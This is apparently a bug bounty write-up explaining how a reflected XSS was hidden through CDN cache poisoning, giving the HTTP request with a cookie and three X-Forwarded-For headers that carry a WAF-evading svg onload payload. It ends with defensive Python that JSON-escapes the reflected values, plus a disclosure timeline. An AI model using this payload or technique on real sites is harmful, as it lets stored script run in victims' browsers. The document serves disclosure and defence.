How I Made $16,500 Hacking CDN Caching Servers — Part 2
@bxmbn

A Nice Way To Hide XSS
Bounty: $2,000
While Google Dorking, I found a particular URL. This time it was not being cached, but if I added a cacheable file extension (.js, .css) at the end of the URL, the response would be cached.
Now all I needed was to find an XSS. I found an injection point in a Cookie, but the WAF would trigger when I added anything after %20
Cookie: cookiename=xss</script%20
While trying to bypass the WAF, I realized that my IP was also being reflected in that same script.
guid="</script ","24.99.19.20"
Since my IP was being reflected, I tried “X-Forwarded-For” headers; this way I could close the <script> and avoid the WAF, as it would trigger if it detected <[anything]>
This is why you will see 3 “X-Forwarded-For” Headers
Request:
GET /xxx/xx/xxx.xx/x.js?t=2021111121 HTTP/2
Host: Redacted
X-Forwarded-For: xss
X-Forwarded-For: xss><svg/onload=globalThis[`al`+/ert/.source]`1`//
X-Forwarded-For: >
Cookie: gdId=xss</script%20
Response:
...
guid="</script ","24.99.19.20","xss","xss><svg/onload=globalThis[`al`+/ert/.source]`1`//,">
...
After poisoning a URL with the XSS, an attacker just needed to send it to the victim:
redacted.com/xxx/xx/xxx.xx/x.js?t=2021111121
A nice way to hide XSS :D
This was my favorite Cache Poisoning, and it was found on a Public Program
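As an added defender-side example (not code from this writeup or from the affected site), the Python below contrasts the raw concatenation pattern visible in the response above with a hypothetical hardened renderer that JSON-encodes the values and escapes `<`, `>` and `&`, so reflected cookie or header data can no longer close the script element. The value list is constructed from the writeup; the function names are my own.

```python
import json

# Constructed sample values modelled on the response in the writeup: the cookie
# value, the client IP, and the three X-Forwarded-For values, in the order the
# page reflects them into the inline script.
REFLECTED_VALUES = [
    '</script ',
    '24.99.19.20',
    'xss',
    'xss><svg/onload=globalThis[`al`+/ert/.source]`1`//',
    '>',
]

# Characters that must never reach an inline <script> body unescaped: "<" and
# ">" let string data close the script element or open a new tag, "&" matters
# if the same template is ever reused inside an HTML attribute.
_JS_ESCAPES = {'<': '\\u003c', '>': '\\u003e', '&': '\\u0026'}

SAFE_PREFIX = '<script>var guid='
SAFE_SUFFIX = ';</script>'


def render_guid_script_unsafe(values):
    """The pattern the writeup shows: raw concatenation into a JS string literal."""
    return '<script>guid="%s"</script>' % '","'.join(values)


def render_guid_script_safe(values):
    """Hypothetical hardened renderer: JSON-encode the list (json.dumps escapes
    quotes, backslashes and non-ASCII), then escape the HTML-significant
    characters as JS unicode escapes so the HTML parser never sees them."""
    encoded = json.dumps(values)
    for ch, esc in _JS_ESCAPES.items():
        encoded = encoded.replace(ch, esc)
    return SAFE_PREFIX + encoded + SAFE_SUFFIX


def script_body_is_safe(markup):
    """True if nothing between the outer <script> tags could start or end a tag."""
    body = markup[len('<script>'):-len('</script>')]
    return '<' not in body and '>' not in body


def decode_safe_guid(markup):
    """Recover the values a browser's JSON-compatible parser would see."""
    return json.loads(markup[len(SAFE_PREFIX):-len(SAFE_SUFFIX)])
```

This only fixes the output encoding; the cache side of the bug is that an unkeyed header is reflected into a cacheable resource at all, which is what should be removed or keyed.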
Timeline:
Reported → December 11, 2021
Triaged → December 14, 2021
Bounty Awarded → January 7, 2022
Fixed → March 7, 2022
Next:
Part 3: Cache Poisoning DoS Via X-Forwarded-Scheme Header